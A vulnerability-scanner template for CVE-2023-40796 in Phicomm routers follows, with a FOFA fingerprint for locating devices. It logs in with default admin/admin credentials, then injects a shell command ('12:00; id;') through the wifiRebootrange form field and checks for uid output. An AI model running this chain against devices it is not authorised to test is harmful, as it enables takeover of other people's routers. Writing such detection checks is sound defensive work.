漏洞描述
FOFA: icon_hash="-1344736688"
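# Scanner template: authenticated command execution check for the Phicomm
# router LuCI admin backend (CVE-2023-40796).
#
# How to read a hit:
#   - r0 signs in as admin with password YWRtaW4= (base64 of "admin").
#     A match therefore means the device accepts admin/admin AND the
#     wifireboot endpoint executes injected input.
#   - A device whose admin password was changed fails r0 and is reported as
#     not vulnerable, although the endpoint may still be injectable for any
#     authenticated user. Treat a miss as "not confirmed", not as "patched".
#
# Remediation for a confirmed device: change the admin password, keep the
# management interface off untrusted networks, and apply a vendor firmware
# fix if one exists (NOTE(review): no fixed version is named on this page).
id: CVE-2023-40796

info:
  name: 斐讯 Phicomm 路由器后台命令执行
  author: zan8in
  severity: critical
  verified: true
  # The original description held only the FOFA fingerprint query; a short
  # summary is added so that report output explains the finding.
  description: |-
    Phicomm router LuCI admin backend: after login, the wifiRebootrange field
    of POST /cgi-bin/luci/;stok=<token>/admin/wifireboot is executed as a
    shell command. This check signs in as admin with password admin first.
    FOFA: icon_hash="-1344736688"
  reference:
    - https://mp.weixin.qq.com/s/fqZKlwtsUZnrTcWlib_oqQ
  tags: phicomm,rce
  created: 2023/10/13

set:
  # Base URL of the target, echoed back in the login form's action_url field.
  hosturl: request.url
  # Random suffix for the multipart boundary used in r1.
  rboundary: randomLowercase(8)

rules:
  # Step 1: log in and capture the session token (stok) and the session cookie.
  r0:
    request:
      method: POST
      path: /cgi-bin/luci/admin/login
      body: |
        action_mode=apply&action_url={{hosturl}}/cgi-bin/luci/admin/login&username=admin&password=YWRtaW4=
    # Success is a 302 to /admin/index that also sets a cookie.
    expression: response.raw_header.ibcontains(b'set-cookie') && response.status == 302 && response.headers["location"].contains("/admin/index")
    output:
      search: '"/cgi-bin/luci/;stok=(?P<stok>.*?)/admin/index".bsubmatch(response.raw_header)'
      stok: search["stok"]
      # cook is a live session credential; keep it out of saved scan output.
      search1: '"Set-Cookie: (?P<cook>.*?);".bsubmatch(response.raw_header)'
      cook: search1["cook"]

  # Step 2: submit the wifi reboot form with a harmless `id` marker appended to
  # wifiRebootrange, then look for `id` output in the response body.
  # NOTE(review): this is a POST to a settings form, so it may alter the
  # device's stored reboot schedule - confirm before running on production.
  # NOTE(review): the wifiRebootEnablestatus and wifiRebootendrange values are
  # the literal text "%s" and "%s:". They look like leftover format
  # placeholders from the script this was ported from; confirm the intended
  # values, since the device may reject the form and cause a false negative.
  r1:
    request:
      method: POST
      path: /cgi-bin/luci/;stok={{stok}}/admin/wifireboot
      headers:
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
        Cookie: "{{cook}}"
      body: "\
        ------WebKitFormBoundary{{rboundary}}\r\n\
        Content-Disposition: form-data; name=\"wifiRebootEnablestatus\"\r\n\
        \r\n\
        %s\r\n\
        ------WebKitFormBoundary{{rboundary}}\r\n\
        Content-Disposition: form-data; name=\"wifiRebootrange\"\r\n\
        \r\n\
        12:00; id;\r\n\
        ------WebKitFormBoundary{{rboundary}}\r\n\
        Content-Disposition: form-data; name=\"wifiRebootendrange\"\r\n\
        \r\n\
        %s:\r\n\
        ------WebKitFormBoundary{{rboundary}}\r\n\
        Content-Disposition: form-data; name=\"cururl2\"\r\n\
        \r\n\
        \r\n\
        ------WebKitFormBoundary{{rboundary}}--\r\n\
        "
    # Matches uid=/gid=/groups= output; requiring the numeric id plus the
    # parenthesised name keeps ordinary page text from matching.
    expression: response.status == 200 && "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)".bmatches(response.body)

# Both steps must succeed: login with admin/admin, then command output seen.
expression: r0() && r1()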